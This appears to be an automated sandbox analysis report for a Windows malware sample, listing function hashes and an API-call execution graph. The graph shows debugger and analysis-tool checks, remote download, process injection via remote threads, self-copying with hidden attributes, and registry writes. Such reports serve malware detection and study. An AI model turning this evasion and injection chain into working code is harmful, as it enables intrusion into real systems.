                                                                                                                                                                                                                                                    • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                                    • API String ID: 2853470409-928700279
                                                                                                                                                                                                                                                    • Opcode ID: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction ID: 3bc586707e7399105e09906f10e53d6e1f23a4e553459b516ca3c4ecd6ad83c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7219F2CE1894BA0EA40EB24EC611F96720FF51755F8409F1E48ED23E2EE3CE546B750
                                                                                                                                                                                                                                                    Function 00007FF63A832E30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                                    • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                                    • API String ID: 299056699-189039185
                                                                                                                                                                                                                                                    • Opcode ID: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction ID: 2013a3d6ccf6939eeca1195eb4950474987f2e2c2aae0f4d860d21cea5fe1953
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6601A52EA0CA4281E734EB21EC442696760FFD9BA5F4405B5E9CEC27B4DE3CD585BA00
                                                                                                                                                                                                                                                    Function 00007FF63A833D28 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1083639309-0
                                                                                                                                                                                                                                                    • Opcode ID: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction ID: 5be0dafcd4db1278019764c6606e3614e3011c74f7509df2e20896df2b5bcdaf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F21E739A0CA8681E670DB11EC4836A6760FB85B54F444274CADE82AE8DF3DD445FB00
                                                                                                                                                                                                                                                    Function 00007FF63A833BE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                    • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                                    • Opcode ID: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction ID: 6ed9fdb517c9429e7ef5e9a455a8186ad847179df02f2bf54d11747da831bef9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2331B97A61CAC585D770DB19E8987AAA3A0F788B40F400235DACDC3BA8DF3DD554EB00
                                                                                                                                                                                                                                                    Function 00007FF63A833A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                                                                                    • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                                    • API String ID: 779948276-85274793
                                                                                                                                                                                                                                                    • Opcode ID: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction ID: 4971df6595eb6926c1932ea328f827867251207c34e86715369ad1c1c2ff64ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C501D37AA18A808AD7908F14F84471AB7A4FB88794F901225EACD83BA8DF7DC144DB00
                                                                                                                                                                                                                                                    Function 00007FF63A8349BF Relevance: 6.3, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocCloseFreeHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2328737614-0
                                                                                                                                                                                                                                                    • Opcode ID: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction ID: a25954b1225db225f824ba3d542e69a0a1e212954e04deb4b13e5ecfa3a93574
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF31122A709B8086DA64CB59F89036AB7A0F7D8B91F014135EE8DD37A8DF3CD4459B00

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:38.2%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:470
                                                                                                                                                                                                                                                    Total number of Limit Nodes:8
                                                                                                                                                                                                                                                    execution_graph 1270 7ff6eef249bf 1273 7ff6eef249cf 1270->1273 1271 7ff6eef24b03 GetProcessHeap HeapFree CloseHandle 1272 7ff6eef24b29 1271->1272 1273->1271 1274 7ff6eef24a14 GetProcessHeap HeapAlloc 1273->1274 1275 7ff6eef24a61 1273->1275 1274->1275 1275->1271 762 7ff6eef23360 821 7ff6eef210a0 762->821 767 7ff6eef23378 ExitProcess 768 7ff6eef23380 1041 7ff6eef24168 GetCurrentProcess OpenProcessToken 768->1041 772 7ff6eef2339b 773 7ff6eef233ff 772->773 774 7ff6eef233b0 772->774 776 7ff6eef23414 773->776 779 7ff6eef23450 773->779 1056 7ff6eef242a8 CreateMutexExA 774->1056 780 7ff6eef242a8 3 API calls 776->780 777 7ff6eef233d6 ExitProcess 784 7ff6eef234a6 779->784 785 7ff6eef23465 779->785 782 7ff6eef23420 780->782 781 7ff6eef242a8 3 API calls 783 7ff6eef233cf 781->783 786 7ff6eef23427 ExitProcess 782->786 787 7ff6eef2342f 782->787 783->777 788 7ff6eef233de 783->788 1074 7ff6eef23978 784->1074 789 7ff6eef242a8 3 API calls 785->789 1069 7ff6eef23180 787->1069 1060 7ff6eef23210 788->1060 794 7ff6eef23471 789->794 793 7ff6eef233e3 797 7ff6eef233f7 ExitProcess 793->797 798 7ff6eef233ea SleepEx 793->798 799 7ff6eef23478 ExitProcess 794->799 800 7ff6eef23480 794->800 795 7ff6eef23434 801 7ff6eef23448 ExitProcess 795->801 802 7ff6eef2343b Sleep 795->802 798->793 804 7ff6eef23180 21 API calls 800->804 802->795 808 7ff6eef23485 804->808 806 7ff6eef234be 809 7ff6eef242a8 3 API calls 806->809 807 7ff6eef23512 7 API calls 810 7ff6eef23499 ExitProcess 808->810 811 7ff6eef2348c Sleep 808->811 812 7ff6eef234ca 809->812 811->808 813 7ff6eef234e4 ExitProcess 812->813 814 7ff6eef242a8 3 API calls 812->814 815 7ff6eef234dd 814->815 815->813 816 7ff6eef234ec 815->816 817 7ff6eef23210 51 API calls 816->817 818 7ff6eef234f1 817->818 819 7ff6eef234f8 Sleep 818->819 820 7ff6eef23505 ExitProcess 818->820 819->818 1084 7ff6eef21000 LoadLibraryA GetProcAddress 821->1084 823 7ff6eef21131 1085 7ff6eef21000 LoadLibraryA GetProcAddress 823->1085 825 7ff6eef2114b 1086 7ff6eef21050 LoadLibraryA GetProcAddress 825->1086 827 7ff6eef21165 1087 7ff6eef21050 LoadLibraryA GetProcAddress 827->1087 829 7ff6eef2117f 1088 7ff6eef21050 LoadLibraryA GetProcAddress 829->1088 831 7ff6eef21199 1089 7ff6eef21050 LoadLibraryA GetProcAddress 831->1089 833 7ff6eef211b3 1090 7ff6eef21050 LoadLibraryA GetProcAddress 833->1090 835 7ff6eef211cd 1091 7ff6eef21050 LoadLibraryA GetProcAddress 835->1091 837 7ff6eef211e7 1092 7ff6eef21050 LoadLibraryA GetProcAddress 837->1092 839 7ff6eef21201 1093 7ff6eef21050 LoadLibraryA GetProcAddress 839->1093 841 7ff6eef2121b 1094 7ff6eef21050 LoadLibraryA GetProcAddress 841->1094 843 7ff6eef21235 1095 7ff6eef21050 LoadLibraryA GetProcAddress 843->1095 845 7ff6eef2124f 1096 7ff6eef21050 LoadLibraryA GetProcAddress 845->1096 847 7ff6eef21269 1097 7ff6eef21050 LoadLibraryA GetProcAddress 847->1097 849 7ff6eef21283 1098 7ff6eef21050 LoadLibraryA GetProcAddress 849->1098 851 7ff6eef2129d 1099 7ff6eef21050 LoadLibraryA GetProcAddress 851->1099 853 7ff6eef212b7 1100 7ff6eef21050 LoadLibraryA GetProcAddress 853->1100 855 7ff6eef212d1 1101 7ff6eef21050 LoadLibraryA GetProcAddress 855->1101 857 7ff6eef212eb 1102 7ff6eef21050 LoadLibraryA GetProcAddress 857->1102 859 7ff6eef21305 1103 7ff6eef21050 LoadLibraryA GetProcAddress 859->1103 861 7ff6eef2131f 1104 7ff6eef21050 LoadLibraryA GetProcAddress 861->1104 863 7ff6eef21339 1105 7ff6eef21050 LoadLibraryA GetProcAddress 863->1105 865 7ff6eef21353 1106 7ff6eef21050 LoadLibraryA GetProcAddress 865->1106 867 7ff6eef2136d 1107 7ff6eef21050 LoadLibraryA GetProcAddress 867->1107 869 7ff6eef21387 1108 7ff6eef21050 LoadLibraryA GetProcAddress 869->1108 871 7ff6eef213a1 1109 7ff6eef21050 LoadLibraryA GetProcAddress 871->1109 873 7ff6eef213bb 1110 7ff6eef21050 LoadLibraryA GetProcAddress 873->1110 875 7ff6eef213d5 1111 7ff6eef21050 LoadLibraryA GetProcAddress 875->1111 877 7ff6eef213ef 1112 7ff6eef21050 LoadLibraryA GetProcAddress 877->1112 879 7ff6eef21409 1113 7ff6eef21050 LoadLibraryA GetProcAddress 879->1113 881 7ff6eef21423 1114 7ff6eef21050 LoadLibraryA GetProcAddress 881->1114 883 7ff6eef2143d 1115 7ff6eef21050 LoadLibraryA GetProcAddress 883->1115 885 7ff6eef21457 1116 7ff6eef21050 LoadLibraryA GetProcAddress 885->1116 887 7ff6eef21471 1117 7ff6eef21050 LoadLibraryA GetProcAddress 887->1117 889 7ff6eef2148b 1118 7ff6eef21050 LoadLibraryA GetProcAddress 889->1118 891 7ff6eef214a5 1119 7ff6eef21050 LoadLibraryA GetProcAddress 891->1119 893 7ff6eef214bf 1120 7ff6eef21050 LoadLibraryA GetProcAddress 893->1120 895 7ff6eef214d9 1121 7ff6eef21050 LoadLibraryA GetProcAddress 895->1121 897 7ff6eef214f3 1122 7ff6eef21050 LoadLibraryA GetProcAddress 897->1122 899 7ff6eef2150d 1123 7ff6eef21050 LoadLibraryA GetProcAddress 899->1123 901 7ff6eef21527 1124 7ff6eef21050 LoadLibraryA GetProcAddress 901->1124 903 7ff6eef21541 1125 7ff6eef21050 LoadLibraryA GetProcAddress 903->1125 905 7ff6eef2155b 1126 7ff6eef21050 LoadLibraryA GetProcAddress 905->1126 907 7ff6eef21575 1127 7ff6eef21050 LoadLibraryA GetProcAddress 907->1127 909 7ff6eef2158f 1128 7ff6eef21050 LoadLibraryA GetProcAddress 909->1128 911 7ff6eef215a9 1129 7ff6eef21050 LoadLibraryA GetProcAddress 911->1129 913 7ff6eef215c3 1130 7ff6eef21050 LoadLibraryA GetProcAddress 913->1130 915 7ff6eef215dd 1131 7ff6eef21050 LoadLibraryA GetProcAddress 915->1131 917 7ff6eef215f7 1132 7ff6eef21050 LoadLibraryA GetProcAddress 917->1132 919 7ff6eef21611 1133 7ff6eef21050 LoadLibraryA GetProcAddress 919->1133 921 7ff6eef2162b 1134 7ff6eef21050 LoadLibraryA GetProcAddress 921->1134 923 7ff6eef21645 1135 7ff6eef21050 LoadLibraryA GetProcAddress 923->1135 925 7ff6eef2165f 1136 7ff6eef21050 LoadLibraryA GetProcAddress 925->1136 927 7ff6eef21679 1137 7ff6eef21050 LoadLibraryA GetProcAddress 927->1137 929 7ff6eef21693 1138 7ff6eef21050 LoadLibraryA GetProcAddress 929->1138 931 7ff6eef216ad 1139 7ff6eef21050 LoadLibraryA GetProcAddress 931->1139 933 7ff6eef216c7 1140 7ff6eef21050 LoadLibraryA GetProcAddress 933->1140 935 7ff6eef216e1 1141 7ff6eef21050 LoadLibraryA GetProcAddress 935->1141 937 7ff6eef216fb 1142 7ff6eef21050 LoadLibraryA GetProcAddress 937->1142 939 7ff6eef21715 1143 7ff6eef21050 LoadLibraryA GetProcAddress 939->1143 941 7ff6eef2172f 1144 7ff6eef21050 LoadLibraryA GetProcAddress 941->1144 943 7ff6eef21749 1145 7ff6eef21050 LoadLibraryA GetProcAddress 943->1145 945 7ff6eef21763 1146 7ff6eef21050 LoadLibraryA GetProcAddress 945->1146 947 7ff6eef2177d 1147 7ff6eef21050 LoadLibraryA GetProcAddress 947->1147 949 7ff6eef21797 1148 7ff6eef21050 LoadLibraryA GetProcAddress 949->1148 951 7ff6eef217b1 1149 7ff6eef21050 LoadLibraryA GetProcAddress 951->1149 953 7ff6eef217cb 1150 7ff6eef21050 LoadLibraryA GetProcAddress 953->1150 955 7ff6eef217e5 1151 7ff6eef21050 LoadLibraryA GetProcAddress 955->1151 957 7ff6eef217ff 1152 7ff6eef21050 LoadLibraryA GetProcAddress 957->1152 959 7ff6eef21819 1153 7ff6eef21050 LoadLibraryA GetProcAddress 959->1153 961 7ff6eef21833 1154 7ff6eef21050 LoadLibraryA GetProcAddress 961->1154 963 7ff6eef2184d 1155 7ff6eef21050 LoadLibraryA GetProcAddress 963->1155 965 7ff6eef21867 1156 7ff6eef21050 LoadLibraryA GetProcAddress 965->1156 967 7ff6eef21881 1157 7ff6eef21050 LoadLibraryA GetProcAddress 967->1157 969 7ff6eef2189b 1158 7ff6eef21050 LoadLibraryA GetProcAddress 969->1158 971 7ff6eef218b5 1159 7ff6eef21050 LoadLibraryA GetProcAddress 971->1159 973 7ff6eef218cf 1160 7ff6eef21050 LoadLibraryA GetProcAddress 973->1160 975 7ff6eef218e9 1161 7ff6eef21050 LoadLibraryA GetProcAddress 975->1161 977 7ff6eef21903 1162 7ff6eef21050 LoadLibraryA GetProcAddress 977->1162 979 7ff6eef2191d 1163 7ff6eef21050 LoadLibraryA GetProcAddress 979->1163 981 7ff6eef21937 1164 7ff6eef21050 LoadLibraryA GetProcAddress 981->1164 983 7ff6eef21951 1165 7ff6eef21050 LoadLibraryA GetProcAddress 983->1165 985 7ff6eef2196b 1166 7ff6eef21050 LoadLibraryA GetProcAddress 985->1166 987 7ff6eef21985 1167 7ff6eef21050 LoadLibraryA GetProcAddress 987->1167 989 7ff6eef2199f 1168 7ff6eef21050 LoadLibraryA GetProcAddress 989->1168 991 7ff6eef219b9 1169 7ff6eef21050 LoadLibraryA GetProcAddress 991->1169 993 7ff6eef219d3 1170 7ff6eef21050 LoadLibraryA GetProcAddress 993->1170 995 7ff6eef219ed 1171 7ff6eef21050 LoadLibraryA GetProcAddress 995->1171 997 7ff6eef21a07 1172 7ff6eef21050 LoadLibraryA GetProcAddress 997->1172 999 7ff6eef21a21 1173 7ff6eef21050 LoadLibraryA GetProcAddress 999->1173 1001 7ff6eef21a3b 1174 7ff6eef21050 LoadLibraryA GetProcAddress 1001->1174 1003 7ff6eef21a55 1175 7ff6eef21050 LoadLibraryA GetProcAddress 1003->1175 1005 7ff6eef21a6f 1176 7ff6eef21050 LoadLibraryA GetProcAddress 1005->1176 1007 7ff6eef21a89 1177 7ff6eef21050 LoadLibraryA GetProcAddress 1007->1177 1009 7ff6eef21aa3 1178 7ff6eef21000 LoadLibraryA GetProcAddress 1009->1178 1011 7ff6eef21abd 1179 7ff6eef21050 LoadLibraryA GetProcAddress 1011->1179 1013 7ff6eef21ad7 1180 7ff6eef21050 LoadLibraryA GetProcAddress 1013->1180 1015 7ff6eef21af1 1181 7ff6eef21050 LoadLibraryA GetProcAddress 1015->1181 1017 7ff6eef21b0b 1182 7ff6eef21050 LoadLibraryA GetProcAddress 1017->1182 1019 7ff6eef21b25 1183 7ff6eef21050 LoadLibraryA GetProcAddress 1019->1183 1021 7ff6eef21b3f 1184 7ff6eef21050 LoadLibraryA GetProcAddress 1021->1184 1023 7ff6eef21b59 1185 7ff6eef21050 LoadLibraryA GetProcAddress 1023->1185 1025 7ff6eef21b73 1186 7ff6eef21050 LoadLibraryA GetProcAddress 1025->1186 1027 7ff6eef21b8d 1187 7ff6eef21050 LoadLibraryA GetProcAddress 1027->1187 1029 7ff6eef21ba7 1188 7ff6eef21050 LoadLibraryA GetProcAddress 1029->1188 1031 7ff6eef21bc1 1189 7ff6eef21050 LoadLibraryA GetProcAddress 1031->1189 1033 7ff6eef21bdb 1190 7ff6eef21050 LoadLibraryA GetProcAddress 1033->1190 1035 7ff6eef21bf5 1191 7ff6eef21050 LoadLibraryA GetProcAddress 1035->1191 1037 7ff6eef21c0f 1038 7ff6eef23120 IsDebuggerPresent 1037->1038 1039 7ff6eef23132 GetCurrentProcess CheckRemoteDebuggerPresent 1038->1039 1040 7ff6eef2312e 1038->1040 1039->1040 1040->767 1040->768 1042 7ff6eef23385 1041->1042 1043 7ff6eef2418e GetTokenInformation 1041->1043 1052 7ff6eef23be8 GetModuleFileNameW 1042->1052 1192 7ff6eef23a58 VirtualAlloc 1043->1192 1045 7ff6eef241bf GetTokenInformation 1046 7ff6eef24206 AdjustTokenPrivileges CloseHandle 1045->1046 1047 7ff6eef241ec CloseHandle 1045->1047 1193 7ff6eef23a28 1046->1193 1048 7ff6eef23a28 VirtualFree 1047->1048 1049 7ff6eef24201 1048->1049 1049->1042 1053 7ff6eef23cd6 wcsncpy 1052->1053 1054 7ff6eef23c13 PathFindFileNameW wcslen 1052->1054 1055 7ff6eef23c4d 1053->1055 1054->1055 1055->772 1057 7ff6eef233bc 1056->1057 1058 7ff6eef242d4 GetLastError 1056->1058 1057->777 1057->781 1058->1057 1059 7ff6eef242e1 CloseHandle 1058->1059 1059->1057 1196 7ff6eef237c8 1060->1196 1062 7ff6eef23221 1199 7ff6eef21c20 1062->1199 1064 7ff6eef2327d 1064->793 1065 7ff6eef2323b 1065->1064 1216 7ff6eef23fc8 1065->1216 1070 7ff6eef237c8 11 API calls 1069->1070 1071 7ff6eef23190 1070->1071 1255 7ff6eef243b8 CreateFileW 1071->1255 1075 7ff6eef23648 3 API calls 1074->1075 1076 7ff6eef239a3 1075->1076 1077 7ff6eef237c8 11 API calls 1076->1077 1078 7ff6eef239ad GetModuleFileNameW DeleteFileW CopyFileW 1077->1078 1079 7ff6eef234ab 1078->1079 1080 7ff6eef239ef SetFileAttributesW 1078->1080 1082 7ff6eef232f0 GetVersionExW 1079->1082 1267 7ff6eef238b8 RegOpenKeyExW 1080->1267 1083 7ff6eef23321 1082->1083 1083->806 1083->807 1084->823 1085->825 1086->827 1087->829 1088->831 1089->833 1090->835 1091->837 1092->839 1093->841 1094->843 1095->845 1096->847 1097->849 1098->851 1099->853 1100->855 1101->857 1102->859 1103->861 1104->863 1105->865 1106->867 1107->869 1108->871 1109->873 1110->875 1111->877 1112->879 1113->881 1114->883 1115->885 1116->887 1117->889 1118->891 1119->893 1120->895 1121->897 1122->899 1123->901 1124->903 1125->905 1126->907 1127->909 1128->911 1129->913 1130->915 1131->917 1132->919 1133->921 1134->923 1135->925 1136->927 1137->929 1138->931 1139->933 1140->935 1141->937 1142->939 1143->941 1144->943 1145->945 1146->947 1147->949 1148->951 1149->953 1150->955 1151->957 1152->959 1153->961 1154->963 1155->965 1156->967 1157->969 1158->971 1159->973 1160->975 1161->977 1162->979 1163->981 1164->983 1165->985 1166->987 1167->989 1168->991 1169->993 1170->995 1171->997 1172->999 1173->1001 1174->1003 1175->1005 1176->1007 1177->1009 1178->1011 1179->1013 1180->1015 1181->1017 1182->1019 1183->1021 1184->1023 1185->1025 1186->1027 1187->1029 1188->1031 1189->1033 1190->1035 1191->1037 1192->1045 1194 7ff6eef23a39 VirtualFree 1193->1194 1195 7ff6eef23a4c 1193->1195 1194->1195 1195->1042 1231 7ff6eef23648 GetWindowsDirectoryW 1196->1231 1198 7ff6eef237f7 8 API calls 1198->1062 1200 7ff6eef21c4a InternetOpenW 1199->1200 1201 7ff6eef21c77 Sleep 1200->1201 1202 7ff6eef21c84 InternetOpenUrlW 1200->1202 1201->1200 1203 7ff6eef21cbb InternetOpenUrlW 1202->1203 1204 7ff6eef21d0d HttpQueryInfoA 1202->1204 1203->1204 1205 7ff6eef21cf2 InternetCloseHandle Sleep 1203->1205 1206 7ff6eef21d3c InternetCloseHandle InternetCloseHandle Sleep 1204->1206 1207 7ff6eef21d62 1204->1207 1205->1200 1206->1200 1208 7ff6eef21dc9 HttpQueryInfoA GetProcessHeap HeapAlloc 1207->1208 1209 7ff6eef21d6c InternetCloseHandle InternetOpenUrlW 1207->1209 1211 7ff6eef21e2e InternetCloseHandle InternetCloseHandle 1208->1211 1215 7ff6eef21e48 1208->1215 1209->1208 1210 7ff6eef21dae InternetCloseHandle Sleep 1209->1210 1210->1200 1212 7ff6eef21ec7 1211->1212 1212->1065 1213 7ff6eef21e50 InternetReadFile 1214 7ff6eef21e9e InternetCloseHandle InternetCloseHandle 1213->1214 1213->1215 1214->1212 1215->1213 1215->1214 1236 7ff6eef23f08 CreateToolhelp32Snapshot 1216->1236 1219 7ff6eef23fe8 1220 7ff6eef2404f GetCurrentProcess OpenProcessToken 1219->1220 1221 7ff6eef240c6 OpenProcess 1220->1221 1222 7ff6eef2406c LookupPrivilegeValueW 1220->1222 1225 7ff6eef240f2 1221->1225 1230 7ff6eef240e8 1221->1230 1223 7ff6eef240bb CloseHandle 1222->1223 1224 7ff6eef24094 AdjustTokenPrivileges 1222->1224 1223->1221 1224->1223 1229 7ff6eef24126 WaitForSingleObject 1225->1229 1225->1230 1243 7ff6eef22bfc 1225->1243 1227 7ff6eef24148 CloseHandle 1228 7ff6eef24153 1227->1228 1228->1064 1229->1220 1229->1230 1230->1227 1230->1228 1232 7ff6eef2369c GetVolumeInformationW 1231->1232 1233 7ff6eef23692 1231->1233 1235 7ff6eef23718 1232->1235 1233->1232 1234 7ff6eef23782 wsprintfW 1234->1198 1235->1234 1237 7ff6eef23268 1236->1237 1238 7ff6eef23f43 Process32FirstW 1236->1238 1237->1219 1239 7ff6eef23f9d CloseHandle 1238->1239 1240 7ff6eef23f62 wcscmp 1238->1240 1239->1237 1241 7ff6eef23f86 Process32NextW 1240->1241 1242 7ff6eef23f79 1240->1242 1241->1239 1241->1240 1242->1239 1244 7ff6eef22c4f 1243->1244 1245 7ff6eef22c6f 1244->1245 1247 7ff6eef22c91 VirtualAllocEx 1244->1247 1251 7ff6eef229cc 1244->1251 1245->1225 1247->1245 1248 7ff6eef22ccb WriteProcessMemory 1247->1248 1248->1245 1249 7ff6eef22d14 VirtualProtectEx 1248->1249 1249->1245 1250 7ff6eef22d47 CreateRemoteThread 1249->1250 1250->1244 1250->1245 1252 7ff6eef22a45 1251->1252 1253 7ff6eef22b4e StrStrA 1252->1253 1254 7ff6eef22a4c 1252->1254 1253->1252 1253->1254 1254->1244 1256 7ff6eef2442f GetLastError 1255->1256 1257 7ff6eef2440e 1255->1257 1259 7ff6eef231a3 CreateThread Sleep CreateThread 1256->1259 1261 7ff6eef24308 GetFileSize 1257->1261 1259->795 1266 7ff6eef23a58 VirtualAlloc 1261->1266 1263 7ff6eef24334 1264 7ff6eef2437e CloseHandle 1263->1264 1265 7ff6eef24348 SetFilePointer ReadFile 1263->1265 1264->1259 1265->1264 1266->1263 1268 7ff6eef238f9 1267->1268 1269 7ff6eef238fd RegSetValueExW 